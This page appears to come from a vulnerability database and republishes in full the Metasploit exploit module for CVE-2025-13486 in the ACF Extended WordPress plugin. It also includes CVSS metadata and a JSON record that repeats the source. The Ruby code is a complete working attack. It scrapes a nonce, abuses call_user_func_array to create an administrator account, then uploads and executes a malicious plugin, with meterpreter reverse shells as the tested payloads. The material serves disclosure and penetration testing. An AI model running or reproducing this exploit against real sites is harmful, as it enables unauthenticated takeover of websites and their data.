WordPress ACF Extended Unauthenticated RCE via prepare_form()_MSF:EXPLOIT-MULTI-HTTP-WP_ACF_EXTENDED_RCE-

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This module exploits an unauthenticated Remote Code Execution vulnerability in the Advanced Custom Fields: Extended ACF Extended WordPress plugin versions 0.9.0.5 through 0.9.1.1. The vulnerability exists in the prepareform function of the...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-HTTP-WP_ACF_EXTENDED_RCE-

Published Dec 19, 2025 at 18:55

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Payload::Php
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress

prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress ACF Extended Unauthenticated RCE via prepare_form()',
'Description' => %q{
This module exploits an unauthenticated Remote Code Execution vulnerability in the
Advanced Custom Fields: Extended (ACF Extended) WordPress plugin versions 0.9.0.5
through 0.9.1.1. The vulnerability exists in the prepare_form() function of the
acfe_module_form_front_render class, which accepts user-controlled input via the
form[render] parameter and passes it directly to call_user_func_array() without
proper sanitization.

This exploit requires a WordPress page containing an ACF Extended form widget, which
exposes the required nonce token in the page's JavaScript. The NONCE_PAGE option
must be set to the path of such a page.

Once an administrator account is created via wp_insert_user(), the module uploads
and executes a malicious plugin to achieve remote code execution (RCE).
},
'Author' => [
'Marcin Dudek (dudekmar) - CERT.PL', # Vulnerability discovery
'Valentin Lobstein <[email protected]>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-13486'],
['URL', 'https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/']
],
'Platform' => %w[php unix linux win],
'Arch' => [ARCH_PHP, ARCH_CMD],
'DisclosureDate' => '2025-12-02',
'DefaultTarget' => 0,
'Privileged' => false,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('NONCE_PAGE', [true, 'Path to page containing ACF Extended form widget', '']),
OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
])
end

def check
return CheckCode::Unknown unless wordpress_and_online?

plugin_check = check_plugin_version_from_readme('acf-extended', '0.9.2', '0.9.0.5')
return plugin_check if plugin_check == CheckCode::Safe

@nonce = find_nonce
return CheckCode::Unknown('Could not find nonce on specified page') unless @nonce

CheckCode::Appears
end

def exploit
unless wordpress_and_online?
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress')
end

admin_cookie = create_admin_user
upload_and_execute_payload(admin_cookie)
end

def ensure_nonce
return if @nonce

@nonce = find_nonce
fail_with(Failure::NotFound, 'Could not find nonce on specified page') unless @nonce
end

def find_nonce
nonce_page = normalize_uri(target_uri.path, datastore['NONCE_PAGE'])
res = send_request_cgi('method' => 'GET', 'uri' => nonce_page)
return nil unless res&.code == 200 && res.body =~ /"nonce":"([a-f0-9]+)"/i

Regexp.last_match(1).tap { |n| vprint_status("Found nonce in JavaScript: #{n}") }
end

def send_exploit_request
ensure_nonce

send_request_cgi(
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_post' => {
'action' => 'acfe/form/render_form_ajax',
'nonce' => @nonce,
'form[render]' => 'wp_insert_user',
'form[user_login]' => datastore['USERNAME'],
'form[user_email]' => datastore['EMAIL'],
'form[user_pass]' => datastore['PASSWORD'],
'form[role]' => 'administrator'
}
)
end

def create_admin_user
res = send_exploit_request
fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Unexpected response from exploit request.') unless res.body =~ %r{</div>\s*\d+\s*</div>}

print_good('Administrator account created successfully')

cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::UnexpectedReply, 'Failed to log in to WordPress admin.') unless cookie
cookie
end

def upload_and_execute_payload(admin_cookie)
plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"

zip = generate_plugin(plugin_name, payload_name)
unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
end

register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
register_dir_for_cleanup("../#{plugin_name}")

payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
send_request_cgi('uri' => payload_uri, 'method' => 'GET')
end
end

{
    "lastseen": "2025-12-19T19:04:45",
    "description": "This module exploits an unauthenticated Remote Code Execution vulnerability in the Advanced Custom Fields: Extended ACF Extended WordPress plugin versions 0.9.0.5 through 0.9.1.1. The vulnerability exists in the prepareform function of the...",
    "published": "2025-12-19T18:55:36",
    "modified": "2025-12-19T18:55:36",
    "type": "metasploit",
    "title": "WordPress ACF Extended Unauthenticated RCE via prepare_form()",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-HTTP-WP_ACF_EXTENDED_RCE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-13486"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Payload::Php\n  include Msf::Exploit::FileDropper\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::Remote::HTTP::Wordpress\n\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'WordPress ACF Extended Unauthenticated RCE via prepare_form()',\n        'Description' => %q{\n          This module exploits an unauthenticated Remote Code Execution vulnerability in the\n          Advanced Custom Fields: Extended (ACF Extended) WordPress plugin versions 0.9.0.5\n          through 0.9.1.1. The vulnerability exists in the prepare_form() function of the\n          acfe_module_form_front_render class, which accepts user-controlled input via the\n          form[render] parameter and passes it directly to call_user_func_array() without\n          proper sanitization.\n\n          This exploit requires a WordPress page containing an ACF Extended form widget, which\n          exposes the required nonce token in the page's JavaScript. The NONCE_PAGE option\n          must be set to the path of such a page.\n\n          Once an administrator account is created via wp_insert_user(), the module uploads\n          and executes a malicious plugin to achieve remote code execution (RCE).\n        },\n        'Author' => [\n          'Marcin Dudek (dudekmar) - CERT.PL', # Vulnerability discovery\n          'Valentin Lobstein <[email protected]>' # Metasploit module\n        ],\n        'License' => MSF_LICENSE,\n        'References' => [\n          ['CVE', '2025-13486'],\n          ['URL', 'https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/']\n        ],\n        'Platform' => %w[php unix linux win],\n        'Arch' => [ARCH_PHP, ARCH_CMD],\n        'DisclosureDate' => '2025-12-02',\n        'DefaultTarget' => 0,\n        'Privileged' => false,\n        'Targets' => [\n          [\n            'PHP In-Memory',\n            {\n              'Platform' => 'php',\n              'Arch' => ARCH_PHP\n              # tested with php/meterpreter/reverse_tcp\n            }\n          ],\n          [\n            'Unix/Linux Command Shell',\n            {\n              'Platform' => %w[unix linux],\n              'Arch' => ARCH_CMD\n              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp\n            }\n          ],\n          [\n            'Windows Command Shell',\n            {\n              'Platform' => 'win',\n              'Arch' => ARCH_CMD\n              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp\n            }\n          ]\n        ],\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n        }\n      )\n    )\n\n    register_options([\n      OptString.new('NONCE_PAGE', [true, 'Path to page containing ACF Extended form widget', '']),\n      OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),\n      OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),\n      OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])\n    ])\n  end\n\n  def check\n    return CheckCode::Unknown unless wordpress_and_online?\n\n    plugin_check = check_plugin_version_from_readme('acf-extended', '0.9.2', '0.9.0.5')\n    return plugin_check if plugin_check == CheckCode::Safe\n\n    @nonce = find_nonce\n    return CheckCode::Unknown('Could not find nonce on specified page') unless @nonce\n\n    CheckCode::Appears\n  end\n\n  def exploit\n    unless wordpress_and_online?\n      fail_with(Failure::NotFound, 'The target does not appear to be using WordPress')\n    end\n\n    admin_cookie = create_admin_user\n    upload_and_execute_payload(admin_cookie)\n  end\n\n  def ensure_nonce\n    return if @nonce\n\n    @nonce = find_nonce\n    fail_with(Failure::NotFound, 'Could not find nonce on specified page') unless @nonce\n  end\n\n  def find_nonce\n    nonce_page = normalize_uri(target_uri.path, datastore['NONCE_PAGE'])\n    res = send_request_cgi('method' => 'GET', 'uri' => nonce_page)\n    return nil unless res&.code == 200 && res.body =~ /\"nonce\":\"([a-f0-9]+)\"/i\n\n    Regexp.last_match(1).tap { |n| vprint_status(\"Found nonce in JavaScript: #{n}\") }\n  end\n\n  def send_exploit_request\n    ensure_nonce\n\n    send_request_cgi(\n      'method' => 'POST',\n      'uri' => wordpress_url_admin_ajax,\n      'vars_post' => {\n        'action' => 'acfe/form/render_form_ajax',\n        'nonce' => @nonce,\n        'form[render]' => 'wp_insert_user',\n        'form[user_login]' => datastore['USERNAME'],\n        'form[user_email]' => datastore['EMAIL'],\n        'form[user_pass]' => datastore['PASSWORD'],\n        'form[role]' => 'administrator'\n      }\n    )\n  end\n\n  def create_admin_user\n    res = send_exploit_request\n    fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') unless res&.code == 200\n    fail_with(Failure::UnexpectedReply, 'Unexpected response from exploit request.') unless res.body =~ %r{</div>\\s*\\d+\\s*</div>}\n\n    print_good('Administrator account created successfully')\n\n    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n    fail_with(Failure::UnexpectedReply, 'Failed to log in to WordPress admin.') unless cookie\n    cookie\n  end\n\n  def upload_and_execute_payload(admin_cookie)\n    plugin_name = \"wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}\"\n    payload_name = \"ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}\"\n\n    zip = generate_plugin(plugin_name, payload_name)\n    unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)\n      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')\n    end\n\n    register_files_for_cleanup(\"#{payload_name}.php\", \"#{plugin_name}.php\")\n    register_dir_for_cleanup(\"../#{plugin_name}\")\n\n    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, \"#{payload_name}.php\")\n    send_request_cgi('uri' => payload_uri, 'method' => 'GET')\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/wp_acf_extended_rce.rb",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/http/wp_acf_extended_rce/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply